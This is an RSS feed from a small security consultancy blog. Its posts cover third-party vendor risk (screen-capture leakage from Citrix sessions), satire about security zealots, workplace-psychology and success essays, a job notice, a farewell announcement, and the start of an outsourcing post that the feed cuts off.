<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>securitytechscience.com</title>
	<atom:link href="http://securitytechscience.com/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://securitytechscience.com/blog</link>
	<description></description>
	<lastBuildDate>Fri, 14 May 2010 05:06:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>10, 9, 8, &#8230;, 1, Shut down</title>
		<link>http://securitytechscience.com/blog/?p=100</link>
		<comments>http://securitytechscience.com/blog/?p=100#comments</comments>
		<pubDate>Fri, 14 May 2010 05:06:00 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=100</guid>
		<description><![CDATA[This will be the final post on the blog board and eventually I will remove this site. After careful consideration, I have decided to bring the company to a close and return to Ernst &#38; Young, Sydney. I was in search of a specific type of experience and the company has provided the foundation [...]]]></description>
			<content:encoded><![CDATA[<p>This will be the final post on the blog board and eventually I will remove this site. After careful consideration, I have decided to bring the company to a close and return to Ernst &amp; Young, Sydney. I was in search of a specific type of experience, and the company has provided the foundation for me to say that I have surpassed all my previous goals and expectations.</p>
<p>In order to continue on the path of continual improvement, I feel fortunate that I maintained a relationship with the Ernst &amp; Young partners and team, and they have been kind enough to offer me this opportunity.</p>
<p>Look forward to seeing you all in the near future&#8230;</p>
<p>-Jordan</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=100</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Third Party Review</title>
		<link>http://securitytechscience.com/blog/?p=89</link>
		<comments>http://securitytechscience.com/blog/?p=89#comments</comments>
		<pubDate>Wed, 10 Mar 2010 01:42:12 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Citrix]]></category>
		<category><![CDATA[Risk Management]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=89</guid>
		<description><![CDATA[After conducting a number of third party reviews over the years, I thought I would write up a sample of some of the common assumptions organisations make in thinking the third party is securely protecting their best interests. The scope of this blog will be for either a link to a nationally highly secure environment [...]]]></description>
			<content:encoded><![CDATA[<p>After conducting a number of third party reviews over the years, I thought I would write up a sample of some of the common assumptions organisations make in thinking the third party is securely protecting their best interests. The scope of this post is a third party link into either a highly secure domestic environment or a secure international environment.</p>
<p>I am going to skip all the audit items listed in an ISO standard, as these can be downloaded and checked off as part of any security &amp; risk baseline review. There are some pretty comprehensive audit documents up on the ISACA website and also papers in their journal!</p>
<p>Firstly, I want to lay out the scenery: You have engaged a third party vendor who has a dedicated site. They are to connect over a cloud using a VPN tunnel (Internet, MPLS, IPLC). They come in through your third party connection DMZ (hopefully), where they are authenticated (2FA with tokens) and then authorised (AD, Novell, etc.), and a virtual machine is pushed back using some middleware (Windows RPC, Citrix, Desktop Broker, XEN, etc.). So in a nutshell it looks like this:</p>
<p>Third Party &lt;-&gt; Cloud &lt;-&gt; Organisation DMZ  &lt;-&gt; Organisation Applications &amp; Databases</p>
<p>The third party has provided you with a slide deck that outlines how secure their site is&#8230;It probably goes a little something like this -&gt; We have a global footprint and can &#8220;follow the sun&#8221; -&gt; we are &#8220;ISO/IEC 27001:2005&#8221; certified -&gt; our ODC/Production floor set-up is a simple 1, 2, 3, 4 process (no dramas as long as we dictate what you require) -&gt; our networks are secure as we use &#8220;firewalls&#8221; and &#8220;virus scan&#8221; with an &#8220;IPS&#8221; -&gt; our hardware is secure as it is &#8220;hardened&#8221; -&gt; we follow all the high level security controls -&gt; we have an in-built security team with &#8220;incident response&#8221;, DR and BCP options -&gt; You know the spiel ;-)</p>
<p>Each one of the above items, both the infrastructure and the slides can easily be picked apart, but one section I really want to hone in on is something I raised at a Citrix education workshop a number of years ago.</p>
<p>Let&#8217;s assume you follow what the vendor has laid out for you above and you also have a highly secure vendor connection set-up. After all, you spent money having it designed by Architects, having it reviewed by Risk, having it penetration tested by Security, and finally having it audited by an external firm. This end-to-end remote connection infrastructure is tight!</p>
<p>But none of the above is really that important when you go and give the guys on the other end the keys to access your back-end systems. I guess I shouldn&#8217;t say it isn&#8217;t important, but more that it becomes superficial. Much like how a boat with an awesome motor is superficial when there is a hole in the bottom.</p>
<p>What I have noticed with a number of security/risk professionals is that once they start hearing buzz words like firewall, VPN, 2FA, Citrix with lockdown, physically secure room, swipe card, guard on door, etc., they tick off the boxes on their audit checklist but forget to ask the holistic type of questions. Again, it is much like saying, motor&#8230;check, steering wheel&#8230;check, double bed with champagne&#8230;check, and forgetting to ask if there is a hole in the bottom because the water is still out of view.</p>
<p>As an example, the question I asked at the Citrix seminar was in regards to copying &amp; pasting out of Citrix. Most people quickly assumed I was an idiot who didn&#8217;t know about the options to disable this setting, as well as share drive mappings. They were more than happy to quickly proceed to windbag about how the configuration settings should look. Again, it is that checklist mentality, where I already know about the optional settings as I downloaded the documentation too! Reciting my mum&#8217;s shopping list doesn&#8217;t show I am intelligent, it just shows I like to memorise things that could in fact just be written down.</p>
<p>Anyway, the question I was asking was broader&#8230;Although you can have all the secure settings enabled, what if the individual on the other end decides to screenshot from their laptop the information that is in their Citrix session?</p>
<p>Surprisingly (or not, depending on your view), at the time when I reiterated the question for them, the room went silent. They hadn&#8217;t thought about this question before and as such didn&#8217;t have a checklist in memory to recite back. They were in a sense a program without a piece of code to execute&#8230;&#8221;DOES NOT COMPUTE&#8221;. As such, the question was brushed aside and we moved on.</p>
<p>I didn&#8217;t mind at the time, because all I was really doing was pressure testing the awareness of this issue. And what was discovered was a lack of awareness, or said in another way, ignorance. You see, in the above requirements set out by the third party, which you agreed to, they require access to their systems for general operational day-to-day processes. This includes things like time sheets, intranet sites, FTP sites, Internet access, email access, etc.</p>
<p>So if by chance one of the third party agents decides to run a screen capturing tool all day long whilst performing their job (e.g., production support with customer details, development code with intellectual property, back office work with more customer details, etc.), they can be gradually screen scraping this information out unbeknownst to you or the third party &#8211; You cannot see this occurring as you have already given them the keys to view this information to perform their job role. And the third party cannot see it as it is not a virus or an exploit or attack that will trigger the Anti-Virus or IPS &#8211; In short, you just got hosed.</p>
<p>I have plenty of other nice examples like the above, but this blog is long enough as it is. If ever you would like to discuss any of these, I am always available for a chat.</p>
<p>I just love this stuff&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=89</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wrestling with the sun</title>
		<link>http://securitytechscience.com/blog/?p=74</link>
		<comments>http://securitytechscience.com/blog/?p=74#comments</comments>
		<pubDate>Wed, 23 Sep 2009 01:41:46 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Psychology]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=74</guid>
		<description><![CDATA[I once heard a friend describe big business or enterprise organisations as a big wheel that just keeps on turning. When you work within one of these large companies, she said, you only have two choices: 1. Voice your opinion, which is analogous to hurling yourself in front of the big turning wheel as it [...]]]></description>
			<content:encoded><![CDATA[<p>I once heard a friend describe big business or enterprise organisations as a big wheel that just keeps on turning. When you work within one of these large companies, she said, you only have two choices: 1. Voice your opinion, which is analogous to hurling yourself in front of the big turning wheel as it slowly crushes you; or 2. Go with the flow, which is analogous to stepping aside and letting the mammoth wheel pass you by unharmed. This little gem still rings true and has never let me down ;-)</p>
<p>This post is specifically dedicated to all those who, after spending many years within large companies and trying their best to either kill the beast, conquer the beast, serve the beast, avoid the beast, confront the beast, or simply to find the beast, have always failed.</p>
<p>Today is your lucky day my friend, for today the <em>beast</em> shall be unmasked &#8211; Note that I am not talking about the business that occurs within an organisation, I am referring to that eerie feeling you get upon waking on Monday mornings knowing you face another long 5 day slug-a-thon at the office &#8211; The beast is the cause of this existential dread.</p>
<p>Also, this post is about applying the above gem of knowledge appropriately so you don&#8217;t swing too far into indifference, which leads to sloth, torpor and, for the passive aggressive, repressed resentment.</p>
<p>You see, unfortunately for me (in the past), I viewed the beast of an organisation as some sort of <em>system &#8211; </em>It is most likely due to my computer science and information systems university background &#8211; Once you program in a language for a period of time, you begin to take this on as your world view and see the outside world as ones and zeros with variables and constants, etc. In the same sense, if you speak with a Buddhist monk, they may view the world as relatively dualistic with a pinch of infinity to create the world of <em>maya.</em></p>
<p>Anyways, the point is, <em>systems</em> can be manipulated, they can be probed and, with enough time and smarts, hacked to one&#8217;s advantage. But the beast of an organisation is an enigma and is so well hidden it&#8217;s similar to a theologian trying to find God. Just when he thinks he has the case cracked, his <em>thesis</em> is splashed with an <em>antithesis</em> until someone comes along to find the <em>synthesis</em>. Unfortunately for them, the <em>synthesis</em> is just another name for a <em>thesis</em> and so the journey for God continues ad infinitum.</p>
<p>Arrggghhhh!!! I hear you say&#8230;If only I knew where this beast&#8217;s abode was, I would visit during the wee hours and slay him in his, or possibly her, bed. But alas, this beast has no home, no sex and is beyond all your thoughts, or, scarier still, is he, she or it behind them?</p>
<p>But before we get too carried away and either become paranoid or give up the ghost, I want to take you back to my mistake. I mistook the beast for a system, but in reality, the beast is <strong>not</strong> a system. So if it is not a system then what is it, I hear you ask? Stupid questions will only result in stupid answers&#8230;</p>
<p>A better question would be <em>why</em> the beast?</p>
<p>Asking why is a great (and necessary) tool for finding the <em>root </em>cause of any situation. It is the best and possibly only tool for finding the unequivocal crux of the matter in a timely fashion.</p>
<p>To the best of my knowledge, the beast appears to exist as a manifestation of <em>evil</em> people&#8217;s opinions. I specifically use the word evil here because evil begets evil and good begets good. They are, always were, and always will be mutually exclusive. So yes, it is right in saying evil minds produce evil opinions (which originate from evil hearts).</p>
<p>Note that we are no longer in the world of tangibles. We have crossed over from something we may have initially thought was tangible (i.e., we wanted to stick a knife in it) and are now in the realm of the intangible. In this realm, things can easily become confusing as this realm has different set of laws. That&#8217;s why metaphors really help in getting the message across, so here it goes&#8230;</p>
<p>Upon awaking one day, a man notices that it&#8217;s an overcast day. He hates gloomy days because they make him feel gloomy too. This morning is different for the man because he has decided to take this matter up with the shiny pie in the sky. Today is his day to wrestle with the sun.</p>
<p>There is no point going any further with this story as we know it is absurd and the man is an idiot. Not only for letting the weather dictate his mood, but the idea that wrestling with the sun could change the <em>atmosphere.</em></p>
<p>You see, people who try and do <em>blah</em> to the beast are just like the man who tried to wrestle the sun. Whatever is the case, the <em>atmosphere </em>just is what it is. And if you haven&#8217;t figured it out yet, the <em>atmosphere</em> is the <em>beast. It is the mood which is created by ignorant people&#8217;s opinions. </em>Their egoistic attitudes are directly in conflict with your egoistic attitude, causing that grating feeling of angst also known as disharmony. This disharmony is the cause of your routine morning existential angst, resulting in you chasing a mirage. You see, the <em>beast</em> does not truly exist. It is a figment of your egotistic mind&#8217;s creation. Please note, it&#8217;s there, but whatever is created must also end, and as such, the <em>beast</em> can end too.</p>
<p>So now going back to the wheel analogy at the beginning of this post, I would like to reinvent the view of the wheel and add some specificity as an addendum to close out this post&#8230;</p>
<p>If you are not the General Manager or CEO, my advice is to take option 2 every time. Please remember that when recruiters call and offer great jobs that appear greener, remember to remember that the wheel is a pandemic &#8211; it is a monist pantheistic wheel &#8211; It&#8217;s an epidemic of disproportionate scale which you can never escape (as long as you work with other <em>ignorant </em>people). So once again, although you know yourself and what you feel to be right, know it, but go with the flow.</p>
<p>If you are a General Manager or CEO, my advice is that actions speak louder than words. Just as the Government would drop a bomb to clean up a breakout of an infectious disease that has gotten out of control, so too, you must step up and root out all the individuals affected with this disease. Bringing on new and fresh people prior to the extermination will only infect your new help, so if they are brought on early, ensure they are appropriately quarantined. Anything less than this simply <strong><em>does not work</em></strong>.</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=74</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Information Security Syndrome</title>
		<link>http://securitytechscience.com/blog/?p=57</link>
		<comments>http://securitytechscience.com/blog/?p=57#comments</comments>
		<pubDate>Tue, 15 Sep 2009 05:31:54 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Psychology]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=57</guid>
		<description><![CDATA[Today&#8217;s post is an attempt to coin a new psychological response, that is often seen within Enterprises, specifically the Information Security Zealot &#8211; It is meant to be taken light heartedly, but with a serious lesson to take away at the end &#8211; So without further ado, if you currently display the following conditioned responses [...]]]></description>
			<content:encoded><![CDATA[<p>Today&#8217;s post is an attempt to coin a new psychological response that is often seen within Enterprises, specifically in the Information Security Zealot &#8211; It is meant to be taken light-heartedly, but with a serious lesson to take away at the end &#8211; So without further ado, if you currently display the following conditioned responses you are hereby classified as an individual suffering from <em>Information Security Syndrome</em>&#8230;</p>
<p>- You are incapable of mingling outside the security clique due to the obvious fact everyone on the outside is suffering from some form of security &#8220;ignorance&#8221;. As such, they [the non-security personnel] would be incapable of understanding the intricacies of your stealthy security work, and any attempt to explain your &#8220;advanced&#8221; job would be futile. Simply by applying the thin slicing techniques you mastered from your security ways [also cannot be discussed], you have perfected the art of knowing that they will never understand the true essence of what you do. </p>
<p>- At social events you have been dragged along to by your partner, outsiders keep telling you information about themselves they shouldn&#8217;t. You know it wouldn&#8217;t be elite of you if you were to use this information against them, so you politely inform them about phishing exploits, facebook worms, social engineering and the like. Oh no, you&#8217;ve again performed another security faux pas and are trapped talking to these newbies about security 101, like patching your system and firewalls [oh, so 2001]. </p>
<p>- You are certain that everyone else has somehow gotten it wrong and every day is an amazing feat to wake up and discover the world hasn&#8217;t ended in a cyberwar that is imminently about to happen. Thank God for hackers publishing unpatched exploits to make the world a safer place and annual retreats to Black Hat and Defcon to lift your spirits.</p>
<p>- Life and work are not about reducing risks to an acceptable level; they are about eliminating all vulnerabilities and tinkering with the latest bleeding edge coolest tools if possible. </p>
<p>- If your job were a metaphor, other people would describe you as a stage gate or an angry police officer best left alone. You know deep down you are fighting the good fight and tough guys don&#8217;t cry.</p>
<p>- At every security conference, everyone so gets you and you so get them. There is an unbelievable amount of head nodding going on, you&#8217;re amazed they simply don&#8217;t fall off. </p>
<p>- In the office you are forever getting pummelled by the ever increasing sea of threats and yet nobody sees or understands quite what you are talking about. There is an unbelievable amount of head shaking going on, you&#8217;re amazed they simply don&#8217;t fall off. </p>
<p>- You make abusive calls to people who have spyware, malware, viruses on their laptop and who so foolishly jacked into <em>your</em> LAN [Note, not the corporate LAN as you now are the official caretaker - self appointed]. You request they immediately remove the laptop from the network and hang up without any further support &#8211; After all, you&#8217;re a secret crime fighter and have other fires to fight &#8211; To the bat cave.</p>
<p>- You know very well that the most efficient solution to reducing phishing is to call CERT and have them immediately bring down the hacked site. But if you went and did that, how would you ever get a chance to try out the latest phishing kits or reverse engineer code and show how cool and smart you are? Your quest for knowledge and cyberdome wisdom far outweighs the common person&#8217;s problems.</p>
<p>- You can make moral choices on other people&#8217;s behalf because you are a security demi-god.</p>
<p>&#8212;&#8211;<br />
OK, OK, that&#8217;s enough of my attempts at humor to belittle and poke fun at the ever hilarious security zealot. I hope the above didn&#8217;t upset anybody, but at least calls out some home truths about when good intentions don&#8217;t result in good outcomes&#8230; </p>
<p>&#8212;<br />
One issue that came to mind when writing this, and that I also find extremely interesting, is the current disconnect between security and the rest of the population (i.e., the real world). Reading any recent security whitepaper or report, visiting security blogs, or attending any recent security conference only reiterates that the state of cybercrime is <strong>alarming</strong><em>. So why is it that [in a proportion of cases] only the security zealot cares?</em></p>
<p>Why isn&#8217;t this information concerning ever new emerging threats and constantly changing risks being communicated to the people it impacts and who are also in charge of the purse strings and can do something about it [CEO, CFO, CIO, COO, etc]?</p>
<p>In order to answer this question, I am going to turn it around on you. It is up to you to honestly look firstly at yourself and then your team. Have you the right information in the right format for your audience? Have you the right personality and right attitude for your audience? </p>
<p>As a recommendation in resolving this pandemic, raising the issue to be discussed by an appropriate representative, such as the CISO, at a board level would be worthwhile if you had the above boxes ticked off. </p>
<p>Good luck!</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=57</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Opportunity</title>
		<link>http://securitytechscience.com/blog/?p=49</link>
		<comments>http://securitytechscience.com/blog/?p=49#comments</comments>
		<pubDate>Wed, 13 May 2009 23:49:07 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=49</guid>
		<description><![CDATA[Hi All,
A major project I have been involved with for the better part of 3 years is in the wind down phase. As such, I will be looking around for opportunities to offer my services in the coming weeks.
I am looking for opportunities to offer my services in solving organisational problems. Interests include beginning a [...]]]></description>
			<content:encoded><![CDATA[<p>Hi All,</p>
<p>A major project I have been involved with for the better part of 3 years is in the wind down phase. As such, I will be looking around for opportunities to offer my services in the coming weeks.</p>
<p>I am looking for opportunities to offer my services in solving organisational problems. Interests include beginning a new project or assisting BAU whereby I can get involved in resolving organisational systemic and endemic issues. At the crux of it, I like to solve problems.</p>
<p>It is the synchronicity of the business requiring problems to be solved and me having the experience and skill-set to resolve the issues that I am in search of. In these cases, fulfilment and job satisfaction are gained from achieving results, whilst at the same time, appreciation is sown and grown with the business, by helping remediate their operational and technical quagmires.</p>
<p>For any expressions of interest, please contact jordan [at] securitytechscience [dot] com.</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=49</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Three A&#8217;s</title>
		<link>http://securitytechscience.com/blog/?p=45</link>
		<comments>http://securitytechscience.com/blog/?p=45#comments</comments>
		<pubDate>Tue, 21 Apr 2009 09:28:34 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Psychology]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=45</guid>
		<description><![CDATA[Recently I have been contemplating what makes some people successful and others unsuccessful. I am not merely talking about a person’s position within an organisation – If I were, then this would be a very shallow definition of success – After all, if it were merely wealth, position or honours, then success is based only [...]]]></description>
			<content:encoded><![CDATA[<p style="margin-left: 6pt; margin-right: 6pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Recently I have been contemplating what makes some people successful and others unsuccessful. I am not merely talking about a person’s position within an organisation – If I were, then this would be a very shallow definition of success – After all, if it were merely wealth, position or honours, then success is based only on our external world and this would be purely superficial. If you do not agree with this statement then think about the following examples:</span></p>
<p style="margin-left: 44.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l1 level1 lfo1; tab-stops: list 44.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Symbol;">·<span style="font: 7pt ">          </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">An individual is hired within a large company three tiers from the top in a well-respected position. Leveraging psychological testing, previous employment and the interview, the person is now known as passive and is clearly inexperienced to fulfil the role. They get hired because the person who hired them, their boss, intentionally chose this person, as they want to remain unaccountable. The boss is content on leaving the company running as is until their retirement, and especially on the executive pay packet they are receiving. They also need a fall guy too remain in such a cushy position if things ever went pear shaped prior to their planned ejection.</span></p>
<p style="margin-left: 44.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l1 level1 lfo1; tab-stops: list 44.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Symbol;">·<span style="font: 7pt ">          </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">An individual finally becomes appointed an executive manager of a company at the expense of friends and family. They materially achieve everything above and beyond what they set out to acquire, but they are left feeling alienated with a greater sense of void within when not stressed at wits end.</span></p>
<p style="margin-right: 6pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Would you consider the above people successful? The first initially thinks they are successful, but soon realises they are in too deep and cannot control their surroundings &#8211; The job title no long matters when they realise they are just a pawn - The other reaches their potential at the cost of quality of life.</span></p>
<p style="margin-right: 6pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Obviously the above examples are missing something fundamental to be good examples of success. Looking closely at it, each exemplifies the success of something external &#8211; either the company or an external party - but where is the success for the individual. Taking these examples more personally, this post is about asking the question of what makes <strong><em>you</em></strong> a success? </span></p>
<p style="margin-right: 6pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;"><span id="more-45"></span>Googling the three A’s, or if you have ever been to a self-success seminar – Please note I never have (not that there is anything wrong with going or not) – you would have heard about Acceptance, Approval and Appreciation of ideas to gain influence (ie. Power). That’s well and good, but I do not think this will ultimately fulfil you. Let’s be honest here, if you do not love what you do, if you do not have a passion or drive for what you are doing, you won’t be successful. The above A’s will be spotted a mile away as being put on, you’ll be ostracized as a phoney and thus not only unsuccessful, but uninfluential; Which was the intended point. I am not criticizing these three A’s, but am only saying that if you lack what lies underneath (ie. heart), then it is not only these 3 A&#8217;s that are superfluous, but any advice which is given to you.</span></p>
<p style="margin-right: 6pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">So what three A’s am I talking about and how do they have heart? These are the key qualities I strive for in every day to support the team, and I also look for in other people to support me …</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo2; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">1.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Awareness – Consciously present and accepting the current situation at all times. Never dwelling too much on past successes or failures, and never too persistent about reaching the future. Attention to detail on what is important now.</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo2; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">2.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Attitude – Disposition towards positive thoughts and manner expressed in every action.</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo2; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">3.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Aptitude – Innate or acquired capability to achieve what they set out to do. Knowing when a problem is beyond their capability, and being happy to trust other people to perform that function.</span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">Much more could be said about each of these three areas in greater detail, but if you simply keep them in the front of your mind (or write them down and keep them with you), and try to have them become a part of who you are, you will be a success at whatever you do. Why read copious amounts of how-tos when all you need to do is start being these qualities? The egoic mind hates that; it expects that you have to work hard for success and show everyone what a big success you are. Truthfully though, if you just are these qualities and you either accept, enjoy or love what you are being, that is success both within and without. </span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">In order not to go off the rails with such simple and useful advice, be sure to pressure-test yourself every now and then. Ask what your current goals are (i.e. your vision), as this will be a guide for your current focal point. If this vision does not include the three A&#8217;s then you are &#8220;off the mark&#8221; again:</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">1.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Are you only focused on what others can do for you?</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">2.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Do you feel that you are more skilled than your other team members, and it is unfair they are on the same salary, as you clearly do more?</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">3.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Are you only concerned about your salary, or training, or a bonus, etc?</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">4.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Do you resent your boss as you are clearly more intelligent and know more than they do regarding your job?</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">5.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Do you resent others around you for being simple minded or different from you?</span></p>
<p style="margin-left: 38.5pt; text-indent: -18pt; margin-right: 6pt; mso-list: l0 level1 lfo4; tab-stops: list 38.5pt;"><span style="font-size: 7.5pt; color: black; font-family: Verdana;">6.<span style="font: 7pt ">       </span></span><span style="font-size: 7.5pt; color: black; font-family: Verdana;">Are you only satisfied with competing with others and being the winner?</span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">If you answer yes to any of the above, you are focusing on the wrong outcomes. You need to get back to the three A’s above, and try to apply them in daily life. In order to be less selfish, you need to give up on your opinions, that is, the current understanding of how you perceive the world, in which you think you are right. </span><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">Sometimes you do not realise that you are your own worst enemy when it comes to success. </span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">The best question to ask yourself is: am I successful now? If not, then everything (or most) of what you have done up to this point has not worked for you. This means letting go of your past opinions, your stubbornness, your emotional baggage, your ego, your previous unsuccessful conditioning, and inviting the unknown into your life and simply seeing what happens.</span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">Don&#8217;t just take my word for it, but be scientific and test the three A&#8217;s over a few weeks. Use it as a hypothesis in your daily thoughts and actions. For example, in your daily meetings, ask which has the better outcome&#8230;what you previously used to do or following the 3 A&#8217;s?</span></p>
<p><span style="font-size: 7.5pt; color: black; font-family: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-AU; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">Finally, whatever has the better outcome, place this as the focal point of your consciousness and throw away the old. Once you have obtained something good, see if you can do it even better (without forcing), stop reading and go on and see what happens…</span></p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=45</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Outsourcing and Controls</title>
		<link>http://securitytechscience.com/blog/?p=44</link>
		<comments>http://securitytechscience.com/blog/?p=44#comments</comments>
		<pubDate>Mon, 19 Jan 2009 02:21:36 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Risk Management]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=44</guid>
		<description><![CDATA[This post is solely about what I perceive to be the biggest problem with outsourcing. It is not an anti-outsourcing article, but a source of information that you as an outsourcing director, project manager, business owner, etc. should be aware of and also have the right strategic arsenal to overcome&#8230;
The biggest problem: The biggest problem with [...]]]></description>
			<content:encoded><![CDATA[<p>This post is solely about what I perceive to be the biggest problem with outsourcing. It is not an anti-outsourcing article, but a source of information that you as an outsourcing director, project manager, business owner, etc. should be aware of and also have the right strategic arsenal to overcome&#8230;</p>
<p><strong>The biggest problem:</strong> The biggest problem with outsourcing is the perception from organisational owners that they can outsource their systemic problems. This, I would state to be a stupid and most pernicious illusion. Unfortunately it is a far more common situation than most security professionals would hope to see.</p>
<p><strong>Who does this impact: </strong>Everyone. This includes Business Process Outsourcing (BPO), Information Technology Outsourcing (ITO), Knowledge Process Outsourcing (KPO) and any other acronym you come up with to cut &#8220;internal&#8221; jobs in order to achieve strategic advantage, cost savings and process improvements.</p>
<p><strong>Solutions: </strong></p>
<p>Awareness &#8211; Have the project managers build information sessions early on in the process where the owners (ie, business and system) are made <em>aware</em> that they are not outsourcing their systemic issues. That is, any issues are still their issues, as they are still the owners. Have the owners sign up.</p>
